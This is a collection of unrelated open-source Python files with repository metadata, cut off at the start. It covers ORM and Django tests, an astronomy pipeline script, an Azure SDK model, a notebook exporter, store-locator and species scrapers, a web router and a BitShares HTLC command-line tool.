bianca = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 0).one()
bruce = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 1).one()
cameron = self.store.find(MovieCharactersMetadata, MovieCharactersMetadata.id == 2).one()
eq_(bianca.gender(), "f")
eq_(bruce.gender(), "?")
eq_(cameron.gender(), "m")
class MovieConversationTestCase(ORMTestCase):
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_consistency(self):
conversation = self.store.find(MovieConversation, MovieConversation.id == 1).one()
eq_(conversation.first_character.movie.title, conversation.movie.title)
eq_(conversation.second_character.movie.title, conversation.movie.title)
@nose.with_setup(ORMTestCase.setUp, ORMTestCase.tearDown)
def test_line_list(self):
conversation = self.store.find(MovieConversation, MovieConversation.id == 1).one()
line_ids = [line.id for line in conversation.line_list()]
eq_(line_ids, [194, 195, 196, 197])
| sosuke-k/cornel-movie-dialogs-corpus-storm | mdcorpus/tests/test_orm.py | Python | mit | 4,351 |
from ddt import ddt, data
from django.test import TestCase
from six.moves import mock
from waldur_core.core import utils
from waldur_core.structure import tasks
from waldur_core.structure.tests import factories, models
class TestDetectVMCoordinatesTask(TestCase):
@mock.patch('requests.get')
def test_task_sets_coordinates(self, mock_request_get):
ip_address = "127.0.0.1"
expected_latitude = 20
expected_longitude = 20
instance = factories.TestNewInstanceFactory()
mock_request_get.return_value.ok = True
response = {"ip": ip_address, "latitude": expected_latitude, "longitude": expected_longitude}
mock_request_get.return_value.json.return_value = response
tasks.detect_vm_coordinates(utils.serialize_instance(instance))
instance.refresh_from_db()
self.assertEqual(instance.latitude, expected_latitude)
self.assertEqual(instance.longitude, expected_longitude)
@mock.patch('requests.get')
def test_task_does_not_set_coordinates_if_response_is_not_ok(self, mock_request_get):
instance = factories.TestNewInstanceFactory()
mock_request_get.return_value.ok = False
tasks.detect_vm_coordinates(utils.serialize_instance(instance))
instance.refresh_from_db()
self.assertIsNone(instance.latitude)
self.assertIsNone(instance.longitude)
@ddt
class ThrottleProvisionTaskTest(TestCase):
@data(
dict(size=tasks.ThrottleProvisionTask.DEFAULT_LIMIT + 1, retried=True),
dict(size=tasks.ThrottleProvisionTask.DEFAULT_LIMIT - 1, retried=False),
)
def test_if_limit_is_reached_provisioning_is_delayed(self, params):
link = factories.TestServiceProjectLinkFactory()
factories.TestNewInstanceFactory.create_batch(
size=params['size'],
state=models.TestNewInstance.States.CREATING,
service_project_link=link)
vm = factories.TestNewInstanceFactory(
state=models.TestNewInstance.States.CREATION_SCHEDULED,
service_project_link=link)
serialized_vm = utils.serialize_instance(vm)
mocked_retry = mock.Mock()
tasks.ThrottleProvisionTask.retry = mocked_retry
tasks.ThrottleProvisionTask().si(
serialized_vm,
'create',
state_transition='begin_starting').apply()
self.assertEqual(mocked_retry.called, params['retried'])
| opennode/nodeconductor | waldur_core/structure/tests/unittests/test_tasks.py | Python | mit | 2,443 |
#!/usr/bin/env python
# encoding: utf-8
"""
Make a grid of synths for a set of attenuations.
2015-04-30 - Created by Jonathan Sick
"""
import argparse
import numpy as np
from starfisher.pipeline import PipelineBase
from androcmd.planes import BasicPhatPlanes
from androcmd.phatpipeline import (
SolarZIsocs, SolarLockfile,
PhatGaussianDust, PhatCrowding)
from androcmd.phatpipeline import PhatCatalog
def main():
args = parse_args()
av_grid = np.arange(0., args.max_av, args.delta_av)
if args.av is not None:
av = float(args.av)
run_pipeline(brick=args.brick, av=av, run_fit=args.fit)
else:
for av in av_grid:
run_pipeline(brick=args.brick, av=av, run_fit=args.fit)
def parse_args():
parser = argparse.ArgumentParser(
description="Grid of synths for a set of Av")
parser.add_argument('brick', type=int)
parser.add_argument('--max-av', type=float, default=1.5)
parser.add_argument('--delta-av', type=float, default=0.1)
parser.add_argument('--fit', action='store_true', default=False)
parser.add_argument('--av', default=None)
return parser.parse_args()
def run_pipeline(brick=23, av=0., run_fit=False):
dataset = PhatCatalog(brick)
pipeline = Pipeline(root_dir="b{0:d}_{1:.2f}".format(brick, av),
young_av=av, old_av=av, av_sigma_ratio=0.25,
isoc_args=dict(isoc_kind='parsec_CAF09_v1.2S',
photsys_version='yang'))
print(pipeline)
print('av {0:.1f} done'.format(av))
if run_fit:
pipeline.fit('f475w_f160w', ['f475w_f160w'], dataset)
pipeline.fit('rgb', ['f475w_f814w_rgb'], dataset)
pipeline.fit('ms', ['f475w_f814w_ms'], dataset)
class Pipeline(BasicPhatPlanes, SolarZIsocs,
SolarLockfile, PhatGaussianDust, PhatCrowding, PipelineBase):
"""A pipeline for fitting PHAT bricks with solar metallicity isochrones."""
def __init__(self, **kwargs):
super(Pipeline, self).__init__(**kwargs)
if __name__ == '__main__':
main()
| jonathansick/androcmd | scripts/dust_grid.py | Python | mit | 2,095 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class ApplicationGatewayHttpListener(SubResource):
"""Http listener of an application gateway.
:param id: Resource ID.
:type id: str
:param frontend_ip_configuration: Frontend IP configuration resource of an
application gateway.
:type frontend_ip_configuration:
~azure.mgmt.network.v2017_09_01.models.SubResource
:param frontend_port: Frontend port resource of an application gateway.
:type frontend_port: ~azure.mgmt.network.v2017_09_01.models.SubResource
:param protocol: Protocol. Possible values include: 'Http', 'Https'
:type protocol: str or
~azure.mgmt.network.v2017_09_01.models.ApplicationGatewayProtocol
:param host_name: Host name of HTTP listener.
:type host_name: str
:param ssl_certificate: SSL certificate resource of an application
gateway.
:type ssl_certificate: ~azure.mgmt.network.v2017_09_01.models.SubResource
:param require_server_name_indication: Applicable only if protocol is
https. Enables SNI for multi-hosting.
:type require_server_name_indication: bool
:param provisioning_state: Provisioning state of the HTTP listener
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: Name of the resource that is unique within a resource group.
This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
:param type: Type of the resource.
:type type: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'frontend_ip_configuration': {'key': 'properties.frontendIPConfiguration', 'type': 'SubResource'},
'frontend_port': {'key': 'properties.frontendPort', 'type': 'SubResource'},
'protocol': {'key': 'properties.protocol', 'type': 'str'},
'host_name': {'key': 'properties.hostName', 'type': 'str'},
'ssl_certificate': {'key': 'properties.sslCertificate', 'type': 'SubResource'},
'require_server_name_indication': {'key': 'properties.requireServerNameIndication', 'type': 'bool'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
}
def __init__(self, *, id: str=None, frontend_ip_configuration=None, frontend_port=None, protocol=None, host_name: str=None, ssl_certificate=None, require_server_name_indication: bool=None, provisioning_state: str=None, name: str=None, etag: str=None, type: str=None, **kwargs) -> None:
super(ApplicationGatewayHttpListener, self).__init__(id=id, **kwargs)
self.frontend_ip_configuration = frontend_ip_configuration
self.frontend_port = frontend_port
self.protocol = protocol
self.host_name = host_name
self.ssl_certificate = ssl_certificate
self.require_server_name_indication = require_server_name_indication
self.provisioning_state = provisioning_state
self.name = name
self.etag = etag
self.type = type
| lmazuel/azure-sdk-for-python | azure-mgmt-network/azure/mgmt/network/v2017_09_01/models/application_gateway_http_listener_py3.py | Python | mit | 3,718 |
# -*- coding: utf-8 -*-
"""
@file
@brief Custom notebook exporters.
"""
import os
from textwrap import indent
from traitlets import default
from traitlets.config import Config
from jinja2 import DictLoader
from nbconvert.exporters import RSTExporter
from nbconvert.filters.pandoc import convert_pandoc
def convert_pandoc_rst(source, from_format, to_format, extra_args=None):
"""
Overwrites `convert_pandoc
<https://github.com/jupyter/nbconvert/blob/master/nbconvert/filters/pandoc.py>`_.
@param source string to convert
@param from_format from format
@param to_format to format
@param extra_args extra arguments
@return results
"""
return convert_pandoc(source, from_format, to_format, extra_args=None)
def process_raw_html(source, extra_args=None):
"""
Replaces the output of
`add_menu_notebook
<http://www.xavierdupre.fr/app/jyquickhelper/helpsphinx/jyquickhelper/
helper_in_notebook.html#jyquickhelper.helper_in_notebook.add_notebook_menu>`_
by:
::
.. contents::
:local:
"""
if source is None:
return source # pragma: no cover
if 'var update_menu = function() {' in source:
return "\n\n.. contents::\n :local:\n\n"
return "\n\n.. raw:: html\n\n" + indent(source, prefix=' ')
class UpgradedRSTExporter(RSTExporter):
"""
Exports :epkg:`rst` documents.
Overwrites `RSTExporter <https://github.com/jupyter/
nbconvert/blob/master/nbconvert/exporters/rst.py>`_.
* It replaces `convert_pandoc <https://github.com/jupyter/
nbconvert/blob/master/nbconvert/filters/pandoc.py>`_
by @see fn convert_pandoc_rst.
* It converts :epkg:`svg` into :epkg:`png` if possible,
see @see fn process_raw_html.
* It replaces some known :epkg:`javascript`. The output of function
`add_menu_notebook <http://www.xavierdupre.fr/app/jyquickhelper/helpsphinx/jyquickhelper/
helper_in_notebook.html#jyquickhelper.helper_in_notebook.add_notebook_menu>`_
is replaced by ``.. contents::``.
.. index:: notebook export, nbconvert
It extends the template
`rst.tpl <https://github.com/jupyter/nbconvert/blob/master/nbconvert/templates/rst.tpl>`_.
New template is `rst_modified.tpl <https://github.com/sdpython/pyquickhelper/blob/master/
src/pyquickhelper/helpgen/rst_modified.tpl>`_.
It follows the hints given at
`Programatically creating templates
<https://nbconvert.readthedocs.io/en/latest/
nbconvert_library.html#Programatically-creating-templates>`_.
:epkg:`jyquickhelper` should add a string highly recognizable when adding a menu.
"""
def __init__(self, *args, **kwargs):
"""
Overwrites the extra loaders to get the right template.
"""
filename = os.path.join(os.path.dirname(__file__), 'rst_modified.tpl')
with open(filename, 'r', encoding='utf-8') as f:
content = f.read()
filename = os.path.join(os.path.dirname(__file__), 'rst.tpl')
with open(filename, 'r', encoding='utf-8') as f:
content2 = f.read()
dl = DictLoader({'rst_modified.tpl': content, 'rst.tpl': content2})
kwargs['extra_loaders'] = [dl]
RSTExporter.__init__(self, *args, **kwargs)
def default_filters(self):
"""
Overrides in subclasses to provide extra filters.
This should return an iterable of 2-tuples: (name, class-or-function).
You should call the method on the parent class and include the filters
it provides.
If a name is repeated, the last filter provided wins. Filters from
user-supplied config win over filters provided by classes.
"""
for k, v in RSTExporter.default_filters(self):
yield (k, v)
yield ('convert_pandoc_rst', convert_pandoc_rst)
yield ('process_raw_html', process_raw_html)
output_mimetype = 'text/restructuredtext'
export_from_notebook = "reST"
@default('template_file')
def _template_file_default(self):
return "rst_modified.tpl"
@default('file_extension')
def _file_extension_default(self):
return '.rst'
@default('template_name')
def _template_name_default(self):
return 'rst'
@property
def default_config(self):
c = Config({
'ExtractOutputPreprocessor': {
'enabled': True,
'output_filename_template': '{unique_key}_{cell_index}_{index}{extension}'
},
'HighlightMagicsPreprocessor': {
'enabled': True
},
})
c.merge(super(UpgradedRSTExporter, self).default_config)
return c
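# Hedged usage sketch (editor addition, not part of the original module).
# It assumes a notebook named "example.ipynb" sits next to this file; both
# file names below are placeholders.
if __name__ == "__main__":
    import nbformat

    nb = nbformat.read("example.ipynb", as_version=4)
    exporter = UpgradedRSTExporter()
    # from_notebook_node returns the rendered reST body plus a resources dict
    # containing extracted outputs such as images.
    body, resources = exporter.from_notebook_node(nb)
    with open("example.rst", "w", encoding="utf-8") as out:
        out.write(body)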
| sdpython/pyquickhelper | src/pyquickhelper/helpgen/notebook_exporter.py | Python | mit | 4,770 |
# -*- coding: utf-8 -*-
import scrapy
from locations.items import GeojsonPointItem
DAYS = [
'Mo',
'Tu',
'We',
'Th',
'Fr',
'Sa',
'Su'
]
class SparNoSpider(scrapy.Spider):
name = "spar_no"
allowed_domains = ["spar.no"]
start_urls = (
'https://spar.no/Finn-butikk/',
)
def parse(self, response):
shops = response.xpath('//div[@id="js_subnav"]//li[@class="level-1"]/a/@href')
for shop in shops:
yield scrapy.Request(
response.urljoin(shop.extract()),
callback=self.parse_shop
)
def parse_shop(self, response):
props = {}
ref = response.xpath('//h1[@itemprop="name"]/text()').extract_first()
        if ref:  # some links redirect back to the list page
props['ref'] = ref.strip("\n").strip()
else:
return
days = response.xpath('//div[@itemprop="openingHoursSpecification"]')
if days:
for day in days:
day_list = day.xpath('.//link[@itemprop="dayOfWeek"]/@href').extract()
                # map each goodrelations dayOfWeek URI to its index in DAYS and
                # keep the earliest and latest weekday mentioned (e.g. Mo and Fr)
                indices = [
                    DAYS.index(d.replace('https://purl.org/goodrelations/v1#', '')[:2])
                    for d in day_list
                ]
                first = min(indices) if indices else 0
                last = max(indices) if indices else 0
                opens = day.xpath('.//meta[@itemprop="opens"]/@content').extract_first()
                closes = day.xpath('.//meta[@itemprop="closes"]/@content').extract_first()
                props['opening_hours'] = DAYS[first] + '-' + DAYS[last] + ' ' + opens + ' ' + closes
phone = response.xpath('//a[@itemprop="telephone"]/text()').extract_first()
if phone:
props['phone'] = phone
addr_full = response.xpath('//div[@itemprop="streetAddress"]/text()').extract_first()
if addr_full:
props['addr_full'] = addr_full
postcode = response.xpath('//span[@itemprop="postalCode"]/text()').extract_first()
if postcode:
props['postcode'] = postcode
city = response.xpath('//span[@itemprop="addressLocality"]/text()').extract_first()
if city:
props['city'] = city.strip()
props['country'] = 'NO'
lat = response.xpath('//meta[@itemprop="latitude"]/@content').extract_first()
lon = response.xpath('//meta[@itemprop="longitude"]/@content').extract_first()
if lat and lon:
props['lat'] = float(lat)
props['lon'] = float(lon)
props['website'] = response.url
yield GeojsonPointItem(**props)
| iandees/all-the-places | locations/spiders/spar_no.py | Python | mit | 2,746 |
"""
Controller for voting related requests.
"""
import webapp2
from models.vote import VoteHandler
from models.vote_.cast_ballot import BallotHandler
from models.vote_.view_results import ResultsHandler
app = webapp2.WSGIApplication([
('/vote', VoteHandler),
('/vote/cast-ballot', BallotHandler),
('/vote/view-results', ResultsHandler)
], debug=True) | rice-apps/rice-elections | src/controllers/vote.py | Python | mit | 365 |
from galaxy.test.base.twilltestcase import TwillTestCase
#from twilltestcase import TwillTestCase
class EncodeTests(TwillTestCase):
def test_00_first(self): # will run first due to its name
"""3B_GetEncodeData: Clearing history"""
self.clear_history()
def test_10_Encode_Data(self):
"""3B_GetEncodeData: Getting encode data"""
self.run_tool('encode_import_chromatin_and_chromosomes1', hg17=['cc.EarlyRepSeg.20051216.bed'] )
# hg17=[ "cc.EarlyRepSeg.20051216.bed", "cc.EarlyRepSeg.20051216.gencode_partitioned.bed", "cc.LateRepSeg.20051216.bed", "cc.LateRepSeg.20051216.gencode_partitioned.bed", "cc.MidRepSeg.20051216.bed", "cc.MidRepSeg.20051216.gencode_partitioned.bed" ] )
self.wait()
self.check_data('cc.EarlyRepSeg.20051216.bed', hid=1)
# self.check_data('cc.EarlyRepSeg.20051216.gencode_partitioned.bed', hid=2)
# self.check_data('cc.LateRepSeg.20051216.bed', hid=3)
# self.check_data('cc.LateRepSeg.20051216.gencode_partitioned.bed', hid=4)
# self.check_data('cc.MidRepSeg.20051216.bed', hid=5)
# self.check_data('cc.MidRepSeg.20051216.gencode_partitioned.bed', hid=6)
| jmchilton/galaxy-central | galaxy/test/functional/test_3B_GetEncodeData.py | Python | mit | 1,185 |
import click
from bitshares.amount import Amount
from .decorators import online, unlock
from .main import main, config
from .ui import print_tx
@main.group()
def htlc():
pass
@htlc.command()
@click.argument("to")
@click.argument("amount")
@click.argument("symbol")
@click.option(
"--type", type=click.Choice(["ripemd160", "sha1", "sha256", "hash160"]),
default="sha256", prompt="Hash algorithm", show_default=True,
help="Hash algorithm"
)
@click.option(
"--hash", prompt="Hash (hex string)", hide_input=False, confirmation_prompt=True,
help="Hash value as string of hex digits"
)
@click.option(
"--expiration", default=60 * 60, prompt="Expiration (seconds)",
help="Duration of HTLC in seconds"
)
@click.option(
"--length", help="Length of PREIMAGE (not of hash). Generally OK " +
"to leave this as 0 for unconstrained.", default=0, show_default=True
)
@click.option("--account")
@click.pass_context
@online
@unlock
def create(ctx, to, amount, symbol, type, hash, expiration, length, account):
""" Create an HTLC contract from a hash and lock-time
"""
ctx.blockchain.blocking = True
tx = ctx.blockchain.htlc_create(
Amount(amount, symbol),
to,
hash_type=type,
hash_hex=hash,
expiration=expiration,
account=account,
preimage_length=length
)
tx.pop("trx", None)
print_tx(tx)
results = tx.get("operation_results", {})
if results:
htlc_id = results[0][1]
print("Your htlc_id is: {}".format(htlc_id))
@htlc.command()
@click.argument("to")
@click.argument("amount")
@click.argument("symbol")
@click.option(
"--type", type=click.Choice(["ripemd160", "sha1", "sha256", "hash160"]),
default="sha256", prompt="Hash algorithm", show_default=True,
help="Hash algorithm"
)
@click.option(
"--secret", prompt="Redeem Password", hide_input=True, confirmation_prompt=True,
help="Ascii-text preimage"
)
@click.option(
    "--expiration", default=60 * 60, prompt="Expiration (seconds)",
    help="Duration of HTLC in seconds"
)
@click.option(
"--length", help="Length of PREIMAGE (not of hash). Generally OK " +
"to leave this as 0 for unrestricted. If non-zero, must match length " +
"of provided preimage", default=0, show_default=True
)
@click.option("--account")
@click.pass_context
@online
@unlock
def create_from_secret(ctx, to, amount, symbol, type, secret, expiration,
length, account):
"""Create an HTLC contract from a secret preimage
If you are the party choosing the preimage, this version of
htlc_create will compute the hash for you from the supplied
preimage, and create the HTLC with the resulting hash.
"""
if length != 0 and length != len(secret):
raise ValueError("Length must be zero or agree with actual preimage length")
ctx.blockchain.blocking = True
tx = ctx.blockchain.htlc_create(
Amount(amount, symbol),
to,
preimage=secret,
preimage_length=length,
hash_type=type,
expiration=expiration,
account=account,
)
tx.pop("trx", None)
print_tx(tx)
results = tx.get("operation_results", {})
if results:
htlc_id = results[0][1]
print("Your htlc_id is: {}".format(htlc_id))
@htlc.command()
@click.argument("htlc_id")
@click.option(
"--secret", prompt="Redeem Password", hide_input=False, confirmation_prompt=False,
type=str, help="The preimage, as ascii-text, unless --hex is passed"
)
@click.option(
"--hex", is_flag=True, help="Interpret preimage as hex-encoded bytes"
)
@click.option("--account")
@click.pass_context
@online
@unlock
def redeem(ctx, htlc_id, secret, hex, account):
""" Redeem an HTLC contract by providing preimage
"""
encoding = "hex" if hex else "utf-8"
print_tx(ctx.blockchain.htlc_redeem(htlc_id, secret, encoding=encoding,
account=account)
)
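# --- Hedged CLI sketch (editor addition, not part of uptick) ---
# Assuming the package installs an ``uptick`` console entry point and an
# unlocked wallet with sufficient funds, the three commands above could be
# driven roughly as follows; the account name, amount, symbol, hash and
# htlc id are placeholders, and depending on the installed click version the
# command names may use dashes instead of underscores:
#
#   uptick htlc create_from_secret some-account 10 BTS \
#       --type sha256 --secret "my preimage" --expiration 3600
#   uptick htlc create some-account 10 BTS \
#       --type sha256 --hash <hex-digest-of-preimage> --expiration 3600
#   uptick htlc redeem <htlc_id> --secret "my preimage"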
| xeroc/uptick | uptick/htlc.py | Python | mit | 3,974 |
import os.path
import requests
import time
from bs4 import BeautifulSoup
from geotext import GeoText as gt
from string import punctuation
from collections import Counter
import re
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
threats = ['loss', 'fragmentation', 'hunting', 'poaching', 'fishing', 'overfishing', 'environmental', 'environment', 'invasive', 'disease', 'pet', 'pollution']
conservation = ['cites', 'protection law', 'captive breeding', 'protected', 'endangered species act', 'wwf', 'wcs']
conservationString = ''
threatString = ''
def findConservation(string):
consFound = []
string = string.lower()
string = string.replace("<p>", "")
global conservation
for word in conservation:
if word in string:
consFound.append(word)
return consFound
def findThreats(string):
threatsFound = []
string = string.lower()
string = string.replace("<p>", "")
global threats
for word in threats:
if word in string:
threatsFound.append(word)
index = string.index(word)
return threatsFound
def parseThrough(string):
string = string.replace(',','')
s = '<p>'
if s in string:
string = string.split(s)[1]
s = '</p>'
if s in string:
string = string.split(s)[0]
return string
def urlNeeded():
    """Scrape every species page listed in test.txt and write one CSV row per
    page to output.txt."""
global threats
global conservationString
global threatString
allThreats = []
global conservation
allCons = []
f = open('output.txt', "w")
f.write('Scientific Name, Nickname, Common Name, Kingdom, Phylum, Class, Order, Family, Genus, Size, Threats, Conservation, Threat Keywords, Conservation Keywords, status, countries, country_count' + '\n')
with open('test.txt', "rb") as fd:
for line in fd:
line = line.lstrip().rstrip()
url = line
r = requests.get(url)
soup = BeautifulSoup(r.text.encode('utf-8'), 'html.parser')
newName = soup.find('td').text
newName = newName.lstrip().rstrip()
newName = str(newName)
newName = newName.replace(',',';')
f.write(newName + ',')
for t in soup.findAll('h1'):
name = t.text
s = '('
if s in name:
commonName = name.split(s)[0]
scienceName = name.split(s)[1]
scienceName = scienceName.replace(')','')
f.write(scienceName + ',')
print scienceName
f.write(name + ',')
soupsup = soup.findAll('td', align="left")
for node in soupsup:
waant = ''.join(node.findAll(text=True))
waant = str(waant)
waant = waant.replace('\n', '')
f.write(waant + ',')
if "(" in node:
break
items = []
for t in soup.findAll('td'):
items.append(t.text)
check = 9
badge = len(items)
if badge > 6:
f.write(items[badge - 1] + ',')
else:
f.write(',')
badges = soup.findAll("p", class_="Threats")
ofInterest = str(badges)
foundThreats = findThreats(ofInterest)
ofInterest = parseThrough(ofInterest)
threatString = threatString + ofInterest
if ofInterest:
f.write(ofInterest)
f.write(',')
else:
f.write(' ,')
badges = soup.findAll("p", class_="Conservation")
ofInterest = str(badges)
foundCons = findConservation(ofInterest)
ofInterest = parseThrough(ofInterest)
conservationString = conservationString + ofInterest
badges = soup.findAll("p", class_="Range")
badges = str(badges)
countries = gt(badges).country_mentions
countries = str(countries)
#countries = re.sub('[^A-Z]', '', s)
countries = countries.replace(',', '')
cCount = sum(c.isdigit() for c in countries)
cCount = str(cCount)
print cCount
status = soup.findAll("p", class_="Status")
status = str(status)
if 'Critically' in status:
status = 'Critically Endangered'
else:
status = 'Endangered'
if ofInterest:
f.write(ofInterest)
f.write(' ,' + '')
else:
f.write(' ,')
for node in foundThreats:
f.write(node)
f.write(';')
f.write(' ,')
for node in foundCons:
f.write(node)
f.write(';')
f.write(' ,')
f.write(status)
f.write(',')
f.write(countries)
f.write(',')
f.write(cCount)
f.write('\n')
fd.close()
f.close()
def main():
urlNeeded()
main() | andrewedstrom/cs638project | arkive table analysis/parse.py | Python | mit | 5,243 |